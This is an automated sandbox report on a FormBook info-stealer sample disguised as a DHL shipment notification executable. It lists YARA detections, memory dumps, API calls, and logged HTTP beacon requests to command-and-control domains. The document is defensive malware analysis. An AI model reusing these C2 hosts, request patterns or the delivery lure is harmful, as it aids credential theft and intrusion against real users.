34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: svchost.exe, 00000011.00000002.515898561.0000000003A1F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.ultrakill.xyz/
          Source: unknownDNS traffic detected: queries for: www.rtpholywin99.com
          Source: global trafficHTTP traffic detected: GET /amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx HTTP/1.1Host: www.rtpholywin99.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HU HTTP/1.1Host: www.keilaniclothing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqh HTTP/1.1Host: www.ultrakill.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040580F

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D718901_2_00D71890
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D77E881_2_00D77E88
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D796A01_2_00D796A0
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D79C121_2_00D79C12
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D7B3F11_2_00D7B3F1
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D7A1841_2_00D7A184
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D7C3BD1_2_00D7C3BD
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041E28A2_2_0041E28A
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041EBD92_2_0041EBD9
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041E3E92_2_0041E3E9
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041D5632_2_0041D563
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00409E4B2_2_00409E4B
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00409E502_2_00409E50
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041DE6E2_2_0041DE6E
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041DFE42_2_0041DFE4
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D718902_2_00D71890
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D7A1842_2_00D7A184
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D7B3F12_2_00D7B3F1
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D79C122_2_00D79C12
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D77E882_2_00D77E88
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D796A02_2_00D796A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A30917_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F2B2817_2_030F2B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304AB4017_2_0304AB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305EBB017_2_0305EBB0
